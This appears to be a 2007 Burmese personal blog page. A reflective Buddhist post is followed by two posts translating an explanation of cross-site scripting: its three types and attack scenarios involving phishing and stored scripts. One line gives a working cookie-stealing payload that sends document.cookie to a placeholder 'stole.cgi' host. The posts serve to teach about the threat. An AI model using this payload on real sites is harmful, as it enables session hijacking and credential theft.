ကၽြန္ေတာ္အသက္အရြယ္အရ အဆင့္အတန္းအရ အတိုင္းအတာတစ္ခုထိေတာ့ အလုပ္လုပ္ေပးႏိုင္ခဲ့ျပီလို႔ ေတြးမိပါတယ္ ... ကြန္ပ်ဳတာအေၾကာင္း ဘာမွမသိတဲ့သူ အေယာက္ ၁၀၀၀ ေက်ာ္နီးပါးေလာက္ကို ကြန္ပ်ဳတာအေၾကာင္း စိတ္၀င္စားလာေအာင္ ကိုင္တြယ္ရဲလာေအာင္ ကိုယ္တိုင္ ေလ့လာတတ္လာေအာင္ ေလးႏွစ္ေလာက္ အတြင္းမွာ အေျခခံေလာက္ သင္ေပးႏိုင္ခဲ့ပါတယ္ ... ဆယ္ဂဏန္းေလာက္ကိုေတာ့ ဒီထက္ အဆင့္ျမင့္တဲ့ အေၾကာင္းအရာအခ်ိဳ႕ကို လက္ဆင့္ကမ္းႏိုင္ခဲ့ပါတယ္ ... စိတ္၀င္စားတဲ့ ကြန္ပ်ဳတာဘာသာရပ္အခ်ဳိ႕ကို ျမန္မာဘာသာျပန္ခဲ့ပါတယ္ အဲဒီစာအုပ္ေတြဟာ အခုထိေတာ့ လက္ေရးမူ အၾကမ္းထည္ေတြျဖစ္ေနေပမယ့္ အခ်ိန္တစ္ခုမွာေတာ့ အသံုးတည့္မယ့္သူေတြလက္ထဲ ေရာက္သြားမယ္လို႕ ယံုၾကည္ေနမိပါတယ္ ... ေလာေလာဆယ္မွာလဲ အမ်ားအတြက္ အသံုး၀င္ႏိုင္မယ့္ အခ်ဳိ႕ေသာ အေၾကာင္းအရာေတြကို အဂၤလိပ္ဘာသာကေန ျမန္မာဘာသာကို တတ္ႏိုင္သေလာက္ ဘာသာျပန္ျပီး ပတ္၀န္းက်င္ကို ေ၀မွ်ေနမိပါတယ္ ...

အင္တာနက္ သံုးေနရတဲ့အတြက္ Online ေပၚမွာ အခမဲ့ ရႏိုင္သမွ် အားလံုးကို ရွာေဖြအသံုးခ်ျပီး အမ်ားအက်ဳိးရွိမယ့္ ကိစၥေတြမွာ သံုးေန ေ၀ငွေန မိတယ္ ... ကမၻာေက်ာ္တကၠသိုလ္ ၾကီးေတြက အင္တာနက္ေပၚမွာ ဖြင့္ထားတဲ့ သူတို႕ရဲ႕ အြန္လိုင္း စာသင္ခန္းေတြကို ေမႊေႏွာက္ရင္း သင္ခန္းစာေတြကို Download လုပ္ေနမိတာ ကလဲ တစ္ေန႕တစ္ေန႕ အခ်ိန္မနည္းပါဘူး ... ကၽြန္ေတာ္သိထားတာေတြ လုပ္ေပးခ်င္တာေတြ ခ်စ္တဲ့ ေရာင္းရင္း ညီအကိုေတြအားလံုးကို ေ၀ငွေပးခ်င္တာေတြနဲ႕ ရတဲ့ အခ်ိန္က တစ္ခါတစ္ေလ မမွ်သလို ခံစားရတယ္ ... တစ္ဘက္မွာလည္း စား၀တ္ေနေရးအတြက္ တာ၀န္ေတြက ရွိေနေသးတာကိုး ...

ဘာသာတရားဘက္မွာလည္း တတ္စြမ္းသမွ်
လူေတြ ဘာသာေရးကို စိတ္၀င္စားလာေအာင္ စည္းရုံးမိပါတယ္ ...
ျမတ္ဗုဒၶရဲ႕ တရား ဓမၼေတြကို လူေတြသိလာေအာင္
တတ္ႏိုင္တဲ့ ဘက္ကေန လမ္းျပေပးႏိုင္ဖို႕ ၾကိဳးစားေနမိပါတယ္ ...
ရခဲလွတဲ့လူ႕ဘ၀တိုတိုေလးအတြင္းမွာ တတ္ႏိုင္သေလာက္ အမ်ားအတြက္
အက်ဳိးေက်းဇူးျဖစ္ေပၚေစမယ့္ အရာမ်ဳိးေတြပဲ လုပ္သြားခ်င္တယ္ဗ်ာ ...

ေနာက္ဆံုးေတြးမိတာေလးတစ္ခုကေတာ့ ကိုယ့္အေၾကာင္းပါဘဲ ...
  • ကိုယ့္အတြက္ေရာ ကိုယ္တိုင္ဘာေတြလုပ္ခဲ့ဲျပီးျပီလဲ ...
  • ေသဖို႕ အတြက္ေရာ အဆင္သင့္ျဖစ္ေနျပီလား ...
  • ေသရင္ ကိုယ့္ေနာက္ပါလာမယ့္ အလုပ္ ဘယ္ေလာက္လုပ္ခဲ့ျပီလဲ ...
အဲဒါေလးေတြ ျပန္ေတြးေနမိပါတယ္ ...
ေသရင္ ကိုယ့္ေနာက္ပါလာမွာက ဒါန သီလ ပဲရွိသလို
ဒီသံသရာ ၀ဋ္ဆင္းရဲၾကီးထဲကေန အျမန္လြတ္ေျမာက္ေအာင္ လုပ္ေပးႏိုင္တာကလဲ ဘာ၀နာ အလုပ္ပဲရွိတာမို႕ ...
  • အျမန္ဆံုး လုပ္သြားရမယ္ ...
  • တတ္ႏိုင္သမွ် အခ်ိန္ ေနရာမေရြး လုပ္သြားရမယ္ ....
  • ေရာင္းရင္းမိတ္ေဆြေတြကိုလည္း တတ္အားသမွ် တိုက္တြန္းႏႈိးေဆာ္သြားရမယ္ .. .
လို႕ေတြးေနမိရင္း ဒီစာေလးကို ခ်ေရးမိသြားပါတယ္ ....
ျပည္သူခ်စ္တဲ့ ကိုသားၾကီးတစ္ေယာက္ ေကာင္းမြန္တဲ့ ဘံုဘ၀မွာ ေရာက္ရွိေနထိုင္ႏိုင္ပါေစလို႕ ဆုေတာင္းေပးရင္း ျပဳခဲ့သမွ် ေကာင္းမွဳကုသိုလ္ေတြကိုလည္း အမွ်ေပးေ၀မိပါတယ္ ...

ရည္ညႊန္း-
(၁) မေသခင္ဘာလုပ္ၾကမလဲ - အရွင္ဆႏၵာဓိက
(၂) မေသခင္ဘာလုပ္ၾကမလဲ - Blog post

Jul 10, 2007

XSS သို႕မဟုတ္ Cross-Site Scripting -တိုက္ခိုက္မႈ နမူနာမ်ား


XSS တိုက္ခိုက္မွႈ နမူနာမ်ား

XSS ဂယ္ေပါက္ အမ်ဳိးမ်ဳိးရွိေနသည့္အတြက္ တိုက္ခိုက္သူမ်ား၏ လုပ္ေဆာင္ပံုမ်ားမွာလည္း အမ်ဳိးမ်ဳိး ျဖစ္လာႏိုင္သည္။
တိုက္ခိုက္မႈနမူနာမ်ားကို ေလ့လာၾကည့္ၾကပါစို႕ ...

အားနည္းခ်က္ (၁)-တိုက္ခိုက္မႈ

  1. တိုက္ခိုက္သူသည္ သားေကာင္ဆီသို႕ အီးေမးလ္ သို႕မဟုတ္ အျခားေသာ နည္းလမ္းတစ္ခု ျဖင့္ ေကာက္က်စ္စြာဖန္တီးထားေသာ အင္တာနက္စာမ်က္ႏွာ တစ္ခုကို ဖြင့္ေပးမည့္ အင္တာနက္လိပ္စာ (ဥပမာ - --www.attackexample.com/test/readme.html-- )တစ္ခုကို ေပးပို႕လိုက္သည္။
  2. သားေကာင္က ထို လိပ္စာကို ႏွိပ္ လိုက္သည္။ (click လုပ္လိုက္သည္။) ဤတြင္ တိုက္ခိုက္သူ၏ ဖန္တီးထားေသာအင္တာနက္ စာမ်က္ႏွာမွာ သားေကာင္၏ အင္တာနက္ၾကည့္ေဆာ့ဖ္၀ဲတြင္ ပြင့္လာသည္။
  3. တိုက္ခိုက္သူက ၾကိဳတင္ဖန္တီးထားသည့္အတိုင္းပင္ ၄င္းစာမ်က္ႏွာတြင္ ပါလာေသာ JavaScript သေကၤတမ်ားက သားေကာင္၏ ကြန္ပ်ဳတာထဲတြင္ ရွိႏွင့္ေနေသာ ဟာကြက္ ျဖစ္ေပၚေနသည့္ အင္တာနက္စာမ်က္ႏွာ တစ္ခုကို ထပ္ဖြင့္လိုက္ၾကသည္။
  4. အဆိုပါ ဟာကြက္ျဖစ္ေပၚေနသည့္ အင္တာနက္စာမ်က္ႏွာထဲတြင္ ပါ၀င္ေနေသာ JavaScript သေကၤတမ်ားက သားေကာင္၏ ကြန္ပ်ဳတာ ဟာ့ဒ္ဒစ္ (Local zone) အတြင္းတြင္ ေကာင္းစြာ အလုပ္လုပ္ႏိုင္သည္။
  5. ဤနည္းအားျဖင့္ တိုက္ခိုက္သူေပးပို႕လိုက္ေသာ ေကာက္က်စ္စြာ ဖန္တီးထားေသာ သေကၤတမ်ားသည္ သားေကာင္၏ ကြန္ပ်ဴတာထဲတြင္ ၾကိဳတင္ရွိေနေသာ ဟာကြက္ကို အခြင့္ေကာင္းယူ အသံုးခ်လ်က္ -
    1. အမိန္႕ေပးခ်က္မ်ား ေပးပို႕ ခိုင္းေစႏိုင္သည္။
    2. အခ်ဳိ႕ေသာ ေဆာ့ဖ္၀ဲမ်ား ပရိုဂရမ္မ်ားကို သားေကာင္မသိဘဲ တိတ္တဆိတ္ အလုပ္လုပ္ေစႏိုင္သည္။
    3. တိုက္ခိုက္သူထံအခ်က္အလက္မ်ား ျပန္လည္ေပးပို႕ႏိုင္သည္။
အားနည္းခ်က္ (၂)-တိုက္ခိုက္မႈ
  1. ေက်ာ္ေက်ာ္သည္ ေအာင္ေအာင္တည္ေထာင္ထားေသာ ၀က္ဘ္ဆိုက္တစ္ခုဆီသို႕ မၾကာခဏ ၀င္ေရာက္လည္ပတ္ေလ့ ရွိသည္။ ၄င္း၀က္ဘ္ဆိုက္သို႕ ၀င္ေရာက္ႏိုင္ရန္အတြက္ ေက်ာ္ေက်ာ္သည္ Username ႏွင့္ Password တစ္ခုကို အသံုးျပဳရသည္။ ၀က္ဘ္ဆိုက္ ထဲတြင္ ေက်ာ္ေက်ာ္၏ ေငြေၾကးဆိုင္ရာ အခ်က္အလက္ မ်ားကဲ့သို႕ေသာ အေရးၾကီး အခ်က္အလက္မ်ား သိမ္းဆည္းထားသည္။
  2. တိုက္ခိုက္သူတစ္ဦးက ေအာင္ေအာင္၏၀က္ဘ္ဆိုက္တြင္ “အေျခအေနအေပၚမူတည္ျပီး ျဖစ္ေပၚလာေသာေပ်ာ႕ကြက္ - Reflected XSS ” တစ္ခု ျဖစ္ေပၚေနေၾကာင္း ေလ့လာ ေတြ႕ရွိထားသည္။
  3. တိုက္ခိုက္သူသည္ အဆိုပါ အားနည္းခ်က္ကို အျမတ္ထုတ္ႏိုင္ရန္အတြက္-
    1. (ေအာင္ေအာင္၏ ၀က္ဘ္ဆိုက္လိပ္စာႏွင့္ ဆင္တူယိုးမွား) အင္တာနက္လိပ္စာအတုတစ္ခုကို ဖန္တီးလိုက္ျပီး ေက်ာ္ေက်ာ္ထံသို႕ အီးေမးလ္တစ္ေစာင္ေပးပို႕လိုက္သည္။
    2. ၄င္းအီးေမးလ္ကိုလည္း ေအာင္ေအာင့္ ထံမွ ေပးပို႕သည့္အလား အျပင္အဆင္တူေအာင္ အားလံုး လွည့္စား ဖန္တီး ထားသည္။
    3. (အင္တာနက္ လံုျခံဳေရးနယ္ပယ္တြင္ ဤနည္းစနစ္ကို အီးေမးလိပ္စာ လွည့္ဖ်ားျခင္း - e-mail address spoofing ဟု ေခၚၾကသည္။)
      (ဥပမာ - --www.google.com-- အစား --www.googla.com--, --www.domainname.com အစား --www.domainame.com-- etc)
  4. ေက်ာ္ေက်ာ္သည္-
    1. ( ၄င္းမၾကာခဏ အသံုးျပဳေနေသာ ေအာင္ေအာင္၏၀က္ဘ္ဆိုက္မွ ေပးပို႕သည့္စာ အမွတ္ျဖင့္) တိုက္ခိုက္သူ၏ အီးေမးလ္ကို ဖြင့္ၾကည့္ရင္း
    2. အထဲရွိ အင္တာနက္လိပ္စာ အတိုင္း လိုက္သြားကာ ေအာင္ေအာင္၏ ၀က္ဘ္ဆိုက္တြင္ Log In ျပဳလုပ္သည္။
  5. ဤတြင္-
    1. တိုက္ခိုက္သူ ဖန္တီးထားေသာ အင္တာနက္လိပ္စာ အတုအတြင္း ျမဳတ္ႏွံထည့္သြင္း ထားေသာ မသမာသည့္ သေကၤတမ်ားက
    2. ေအာင္ေအာင္၏ ၀က္ဘ္ဆိုက္ အတြင္းမွ တိုက္ရိုက္ေပးပို႕လိုက္ေသာ သေကၤတမ်ား ကဲ့သို႕ ဟန္ေဆာင္ကာ
    3. ေက်ာ္ေက်ာ္၏ အင္တာနက္ၾကည့္ ေဆာ့ဖ္၀ဲအတြင္းတြင္ အလုပ္လုပ္ေတာ႕သည္။
    4. ေက်ာ္ေက်ာ္မွ ေအာင္ေအာင္၏ ၀က္ဘ္ဆိုက္ အတြင္းသို႕ ၀င္ေရာက္ႏိုင္ရန္ ထည့္သြင္းေပးရေသာ အေရးၾကီးေသာ အခ်က္အလက္မ်ား (User name, Password, Billing informations .... etc.)ကုိ ခိုးယူကာ တိုက္ခိုက္သူထံသို႕ တိတ္တဆိတ္ေပးပို႕ ေနေတာ႕သည္။
    5. example - Image taken from Microsoft MSDN libarary for XSS
အားနည္းခ်က္ (၃)-တိုက္ခိုက္မႈ
  1. ေအာင္ေအာင္သည္ ၀က္ဘ္ဆိုက္တစ္ခုကို တည္ေထာင္ထားသည္။ ၄င္းဆိုက္ကို အသံုးျပဳေနၾကေသာ သူမ်ားသည္ အျခားေသာသူမ်ား ဖတ္ရႈေစႏိုင္ရန္အတြက္ အသိေပးခ်က္မ်ားႏွင့္ အျခားအေၾကာင္းအရာမ်ားကို ေပးပို႕ခြင့္ရွိၾကသည္။( ဥပမာ-အင္တာနက္ေပၚရွိ ဖိုရမ္မ်ား)
  2. တိုက္ခိုက္သူ တစ္ဦးသည္ ေအာင္ေအာင္၏၀က္ဘ္ဆိုက္တြင္ XSS အားနည္းခ်က္(၃) ကို အသံုးျပဳ၍ တိုက္ခိုက္ႏိုင္သည့္ ေပ်ာ့ကြက္ရွိေနေၾကာင္း သတိထားမိသည္။
  3. တိုက္ခိုက္သူသည္ (လူ႕တို႕၏ စိတ္၀င္စားတတ္ေသာ သဘာ၀ကိုေကာင္းစြာအသံုးခ်လ်က္) ၀က္ဘ္ဆိုက္သို႕ ေရာက္လာမည့္ အျခားသူမ်ားလည္း ေသခ်ာေပါက္လာေရာက္ၾကည့္ရႈမည့္ အျငင္းပြားဖြယ္ရာ ေဆြးေႏြးျငင္းခုန္စရာ အသိေပးခ်က္အခ်ဳိ႕ကို တင္ထားလိုက္သည္။
  4. ထိုအသိေပးခ်က္မ်ားထဲတြင္ တိတ္တဆိတ္ ျမဳတ္ႏွံထည့္သြင္းထားေသာ သေကၤတမ်ားေၾကာင့္၊ လာေရာက္ဖတ္ရႈၾကသည့္-
    1. ၄င္း၀က္ဘ္ဆိုက္သို႕ လာေရာက္လည္ပတ္ေသာသူမ်ား၏ လတ္တေလာအေျခအေနကို သိမ္းဆည္းထားသည့္ အခ်က္အလက္မ်ား (Session cookies) သို႕မဟုတ္
    2. အျခားေသာ အေထာက္အထားမ်ား ( User name, password စသည္)ကို ထိုသူမ်ား မသိေအာင္ တိုက္ခိုက္သူ၏ Web Server ထံသို႕ တိတ္တဆိတ္ ေပးပို႕ေတာ႕သည္။
  5. ေနာက္ပိုင္းတြင္ တိုက္ခိုက္သူသည္ အျခားေသာသူမ်ားအမည္ျဖင့္ ၀က္ဘ္ဆိုက္ထဲသို႕ ၀င္ ေရာက္ျပီး ထင္ရာလုပ္ႏိုင္ေလသည္။
  6. Session cookie မ်ားခိုးယူႏိုင္ေသာ နမူနာ သေကၤတမ်ား
-< href="#" onclick="window.location='http://example.com/stole.cgi?text='+escape(document.cookie); return false;">Click here! < /a >-

ဆက္လက္ေဖာ္ျပပါမည္ ....

REF - http://en.wikipedia.org/wiki/Xss

Jul 6, 2007

XSS သို႕မဟုတ္ Cross-Site Scripting - အမ်ဳိးအစားမ်ား


အမ်ဳိးအစားမ်ား

အခုအခ်ိန္တြင္ XSS ၏အားနည္းခ်က္မ်ားကို အမ်ဳိးအစားသံုးမ်ဳိးျဖင့္ ေဖာ္ျပၾကသည္။
၄င္းတို႕ကို အေခၚရလြယ္ေစရန္ အားနည္းခ်က္ (၁)(၂)(၃) ဟု အမည္ေပးလိုက္ပါမည္။

အားနည္းခ်က္ (၁)

XSS ၏အားနည္းခ်က္(၁) ကို DOM-based သို႕မဟုတ္ Local cross-site scripting ဟုေျပာၾကသည္။ ျပႆနာက တျခားေနရာမွာ မရွိဘဲ ၄င္းအင္တာနက္ စာမ်က္ႏွာအတြင္းမွာပင္ ရွိေနသည္္။ ဥပမာ - ဆိုၾကပါစို႕
  • အကယ္၍ JavaScript သေကၤတ တစ္ခုသည္ အင္တာနက္လိပ္စာ (URL) တစ္ခုကို ေတာင္းဆိုသည့္ ေဆာင္ရြက္ခ်က္တစ္ခုကို ျပဳလုပ္ျပီးေနာက္
  • ရရွိလာေသာ အခ်က္အလက္မ်ားကို အသံုးျပဳျပီး
  • မူလစာမ်က္ႏွာအတြင္းမွာပင္ HTML အခ်ဳိ႕ျပန္ေရးလိုက္သည့္ အခါမ်ဳိးတြင္ XSS ဂယ္ေပါက္(hole) တစ္ခုျဖစ္လာသည္။
လက္ေတြ႕အားျဖင့္ အားနည္းခ်က္(၁)မွာ (၂)ႏွင့္ အေတာ္ေလးဆင္တူသည္။အလြန္အေရးၾကီးေသာ အခ်က္တစ္ခ်က္တြင္သာလွ်င္ ကြဲလြဲမႈရွိေနသည္။
  • Internet Explorer ေဆာ့ဖ္၀ဲ၏ Local Zone ဟုေခၚေသာ၊ အင္တာနက္သံုးေနသူမ်ား၏ ဟာ့ဒ္ဒစ္အတြင္းရွိ Client-site script မ်ားကိုကိုင္တြယ္ လုပ္ေဆာင္ပံုေၾကာင့္၊
  • အားနည္းခ်က္(၁)မွတဆင့္ အေ၀းမွ ထိမ္းေက်ာင္းႏိုင္ေသာ အေနအထားမ်ဳိးအထိ ျဖစ္သြားေစႏိုင္သည္။
ဥပမာ -
  • တိုက္ခိုက္သူတစ္ဦးသည္ ေကာက္က်စ္ေသာ ၀က္ဘ္ဆိုက္တစ္ခုကို အသံုးျပဳလ်က္ရွိေနသည္။
  • ၄င္းဆိုက္တြင္ အင္တာနက္သံုးေနသူတစ္ဦး၏ ကြန္ပ်ဳတာအတြင္းရွိ ဂယ္ေပါက္ျဖစ္ေနေသာ စာမ်က္ႏွာတစ္ခုႏွင့္ ခ်ိတ္ဆက္မႈ(Link)တစ္ခုပါ၀င္ေနသည့္ ဆိုပါစို႕။
  • ထိုအခါတြင္ တိုက္ခိုက္သူသည္ သားေကာင္၏ အင္တာနက္ၾကည့္ေဆာ့ဖ္၀ဲ အတြင္းမွ ဟာကြက္ကိုေကာင္းစြာအသံုးခ်ျပီး ၄င္းလိုရာ သေကၤတမ်ားကို သားေကာင္၏ ကြန္ပ်ဳတာအတြင္းသို႕ တိတ္တဆိတ္ ထည့္သြင္းလိုက္ႏိုင္သည္။
အားနည္းခ်က္ (၂)

အားနည္းခ်က္ (၂)ကို non-persistent သို႕မဟုတ္ reflected ေပ်ာ႕ကြက္ ဟုေျပာၾကသည္။ အျမဲတမ္း ရွိမေနဘဲ အေျခအေနအခ်ဳိ႕အေပၚမူတည္ျပီး ျဖစ္လာသည့္ ေပ်ာ႕ကြက္ျဖစ္သည္ ဟု ဆိုႏိုင္သည္။ အမ်ားဆံုးျဖစ္ေလ့ရွိေသာ ေပ်ာ႕ကြက္လည္းျဖစ္သည္။
  • ဆာဗာဘက္ျခမ္းရွိ သေကၤတမ်ား (Server-site scripts)အေနျဖင့္ အင္တာနက္သံုးေနသူ တစ္ဦးမွ ထည့္သြင္းေပးလိုက္ေသာ အခ်က္အလက္မ်ားကို အသံုးျပဳျပီး
  • ၄င္းအင္တာနက္သံုးသူအတြက္ လိုအပ္ေသာ စာမ်က္ႏွာတစ္ခုကို
  • ေျဖၾကားခ်က္အျဖစ္ ခ်က္ခ်င္းျပန္လည္ ေပးပို႕ရေလ့ရွိသည္။
  • အကယ္အားျဖင့္ အသံုးျပဳသူမ်ား ထည့္ေပးလိုက္သည့္ အခ်က္အလက္မ်ားကို စနစ္တက် စစ္ေဆးျခင္းမျပဳဘဲ (Unvalidated User-supplied Data အျဖစ္) လက္ခံမိလိုက္သည့္အခါ၊
  • ၄င္းအခ်က္အလက္မ်ားမွာ ဆာဗာမွ ျပန္လည္ေပးပို႕လိုက္သည့္ စာမ်က္ႏွာမ်ားထဲတြင္ ပါ၀င္ သြားသည္။
  • ဤအေျခအေနမ်ဳိးက အသံုးျပဳသူဘက္ရွိ သေကၤတမ်ားကို အသက္၀င္ေျပာင္းလဲေနေသာ (Dynamic) စာမ်က္ႏွာတစ္ခု အတြင္းသို႕ ထည့္ေပးလိုက္သလို ျဖစ္သြားေစသည္။
စံအျဖစ္ေဖာ္ျပေလ့ရွိေသာ ဥပမာမွာ ရွာေဖြေရး၀က္ဘ္ဆိုက္မ်ား (Search Engines) တြင္ျဖစ္သည္။
  • အကယ္၍ တစ္စံုတစ္ေယာက္သည္ ရွာေဖြေရး၀က္ဘ္ဆိုက္တစ္ခုတြင္ ရွာေဖြလိုသည့္ စကားလံုးမ်ား ထည့္သြင္းသည့္အခါ
  • HTML မွ အထူးသေကၤတအခ်ဳိ႕ကို ထည့္သြင္းရွာေဖြလိုက္သည္ဆိုပါစို႕၊
  • ထိုအခါတြင္ ထိုသူ ထည့္သြင္းရွာေဖြလိုက္ေသာ စာေၾကာင္းမ်ားကို
    • ရရွိလာေသာ အေျဖမ်ားထဲတြင္ ျပန္လည္ထည့္သြင္း ေဖာ္ျပေပးျခင္း သို႕မဟုတ္
    • ရွာေနေသာ အေၾကာင္းအရာကို အလြယ္တကူ ျပန္လည္ျပင္ဆင္ႏိုင္ရန္အတြက္ ျပန္လည္ေဖာ္ျပေပးျခင္းမ်ုဳိးကို မျဖစ္မေနေဆာင္ရြက္ေပးရသည္။
  • အကယ္၍ ထည့္ေပးလိုက္ေသာ အသံုးအႏႈံးမ်ားအားလံုးတြင္ HTML အတြက္ အက်ဳံးမ၀င္ေသာ အခ်က္အလက္မ်ား ပါလာသည့္အခါ XSS ဂယ္ေပါက္ တစ္ခု ျဖစ္လာသည္။




အစပိုင္းတြင္ ဤျဖစ္ရပ္မွာ-
  • အင္တာနက္သံုးသူမ်ားအေနျဖင့္ မိမိ၏အင္တာနက္ၾကည့္ ေဆာ့ဖ္၀ဲအတြင္းရွိ စာမ်က္ႏွာမ်ားတြင္သာ သေကၤတမ်ား ျပန္လည္ထည့္သြင္းလိုက္သလိုမွ်သာ ျဖစ္ေနေသာေၾကာင့္
  • ဆိုးဆိုးရြားရြား ျပႆနာတစ္ရပ္အေနျဖင့္ ေပၚလာခဲ့ျခင္း မရွိေပ။
  • သို႕ရာတြင္ တိုက္ခိုက္မွဳလုပ္ေဆာင္လိုသူတစ္ဦးအေနျဖင့္ Social Engineering နည္းပညာအခ်ဳိ႕ကို အသံုးျပဳျပီး
    • အင္တာနက္သံုးသူတစ္ဦးထံသို႕
    • ၄င္းအတြက္ အလုပ္လုပ္ေပးမည့္ သေကၤတမ်ား ပါ၀င္ေနေသာ စာမ်က္ႏွာတစ္ခုထံသို႕ ေရာက္ရွိေစမည့္ အင္တာနက္လိပ္စာတစ္ခုကို ဖြင့္ၾကည့္မိေစရန္ စည္းရုံးသိမ္းသြင္း ႏိုင္ေစသည့္ အခြင့္အေရး ရရွိေစႏိုင္လာသည္။
(Social Engineering - မသိနားမလည္သူ၊ အင္တာနက္သံုးသူမ်ား၏ အားနည္းခ်က္ကို အခြင့္ေကာင္းယူျပီး ထိုသူမ်ားထံမွ အေရးၾကီးေသာ ကိုယ္ေရးအခ်က္အလက္မ်ား ေငြေၾကးဆိုင္ရာအခ်က္အလက္မ်ား လွည့္ပတ္ရယူျပီး အျမတ္ထုတ္ျခင္း - သီးျခားေဖာ္ျပပါမည္)

အားနည္းခ်က္ (၃)

အားနည္းခ်က္ (၃)ကို သိမ္းဆည္းထားေသာ (သို႕) အျမဲရွိေနေသာ (သို႕) ဒုတိယအဆင့္ ေပ်ာ႕ကြက္၊အားနည္းခ်က္ ဟု ေျပာေလ့ ရွိၾကသည္။ အစြမ္းအထက္ဆံုးေသာ တိုက္ခိုက္မႈအမ်ဳိးအစားမ်ား ျဖစ္ေပၚေစႏိုင္သည္။
ဥပမာတစ္ခု အေနျဖင့္
  • အင္တာနက္ေပၚရွိေနရာ (သို႕) ဆာဗာ (သို႕) ဖိုင္သိုေလွာင္သိမ္းဆည္းေရးစနစ္ တစ္ခုခု အတြင္းသို႕ အသံုးျပဳေနသူတစ္ဦးက (ပထမလူ-တိုက္ခိုက္သူူ) အခ်က္အလက္မ်ားကို ေပးပို႕ ထည့္သြင္းသိမ္းဆည္းလိုက္သည္။
  • ေနာက္တစ္ခ်ိန္တြင္ အျခားေသာ အသံုးျပဳသူတစ္ဦးက (ဒုတိယလူ-သားေကာင္) ၄င္းစာမ်က္ႏွာကို ဖြင့္ၾကည့္လိုက္မိသည့္အခါတြင္ တိုက္ခိုက္သူဆင္ထားေသာ ေထာင္ေခ်ာက္ထဲသို႕ ေရာက္ရွိသြားရေတာ႕သည္။
  • အထူး စံထားျပသႏိုင္သည့္ ဥပမာတစ္ရပ္မွာ Online Message Boards မ်ားျဖစ္သည္။
  • ၄င္းေနရာမ်ားသည္ အျခားေသာ ၾကည့္ရႈသူမ်ားဖတ္ရႈႏိုင္ရန္အတြက္ HTML သေကၤတမ်ားကို ထည့္သြင္းႏိုင္ရန္ လမ္းဖြင့္ေပးထားျခင္း ေၾကာင့္ျဖစ္သည္။
ဤအားနည္းခ်က္မ်ားမွာ အမ်ားအားျဖင့္ အျခားေသာအမ်ဳိးအစားမ်ားထက္ သိသိသာသာ အက်ဳိးသက္ေရာက္မႈျဖစ္ေစသည္။ အေၾကာင္းမွာ တိုက္ခိုက္သူတစ္ဦး အေနျဖင့္ သေကၤတ (Script) အခ်ဳိ႕ထည့္သြင္းေပးလိုက္ရုံသာ ျဖစ္ျပီး အျခားေသာ သားေကာင္ အေျမာက္အမ်ားကို တိုက္ခိုက္ႏိုင္ေသာေၾကာင့္ ျဖစ္ေပသည္။

သားေကာင္၏ ကြန္ပ်ဳတာမ်ားအတြင္းသို႕ သေကၤတမ်ား ထည့္သြင္းတိုက္ခိုက္ပံု နည္းစနစ္မ်ား (Methods of Injection) မွာ အမ်ဳိးမ်ဳိး ေျပာင္းလဲေနႏိုင္သည္။
  • တိုက္ခိုက္သူတစ္ဦးသည္ အထက္တြင္ေဖာ္ျပထားခဲ့ေသာ ေပ်ာ့ကြက္၊ ဟာကြက္မ်ား သားေကာင္၏ ကြန္ပ်ဳတာေပၚတြင္ ျဖစ္ေပၚလာေစရန္အတြက္ အင္တာနက္အသံုခ်ေဆာ့ဖ္၀ဲ (Web Application) တစ္ခုခုကို အသံုးျပဳရန္ လိုခ်င္မွ လိုမည္ျဖစ္သည္။
  • အင္တာနက္ အသံုးခ်ေဆာ့ဖ္၀ဲ (အီးေမးလ္ ၊ System log စသည့္) အရာတစ္ခုခုမွ လက္ခံရရွိလိုက္သည့္ (တိုက္ခိုက္သူတစ္ဦးမွ ထိန္းခ်ဳပ္ထားႏိုင္ေခ်ရွိေနေသာ) မည္သည့္ အခ်က္အလက္မဆိုသည္ အသက္၀င္ ေနေသာ စာမ်က္ႏွာတစ္ခုအျဖစ္ (Dynamic page) ျပန္လည္ေဖာ္ျပရမည့္ေနရာတြင္
  • ရွိသင့္ရွိထိုက္ေသာ သက္ဆိုင္ရာ သေကၤတမ်ားျဖင့္ အျပည့္အ၀ ပါရွိေနရမည္ ျဖစ္သည္။
  • အကယ္၍ ပါရွိမေနပါက ရလာဒ္အေနျဖင့္ XSS ဆိုင္ရာ ဂယ္ေပါက္ တစ္ခု ျဖစ္ေပၚလာမည္ ျဖစ္ေပသည္။
အေျခအေနအမ်ဳိးမ်ဳိးေၾကာင့္ အခုေဖာ္ျပထားတာေတြကို အေတာ္ေလးအခ်ိန္ယူ ဘာသာျပန္လိုက္ရပါတယ္ ... နည္းပညာ တစ္ခုျဖစ္ေနတာေရာ ကိုယ္နဲ႕ေ၀းတဲ့ အေၾကာင္းအရာတစ္ခုျဖစ္ေနတာေၾကာင့္ေရာ အေတာ္ေလး ေခါင္းစားခဲ့ပါတယ္ ပညာလည္း အေတာ္ရလိုက္ပါတယ္ ... အခုေဖာ္ျပထားတာေတြက မျပည့္စံုေသးပါဘူး စာေၾကာင္းေတြက ရွည္ေနတဲ့ အတြက္ သည္းခံဖတ္ေပးေစခ်င္ပါတယ္ ... ေနာက္ထပ္ ဆက္ျပီး ဘယ္လို အတိုက္ခိုက္ခံရႏိုင္တာလဲ ... ဘယ္လို အကာအကြယ္ေတြ လုပ္မလဲ ဆိုတာေတြကို နမူနာေတြ ရုပ္ရွင္ေတြနဲ႕ ရွာေဖြ ေဖာ္ျပသြားမွာပါ ....

ဆက္လက္ေဖာ္ျပပါမည္ ....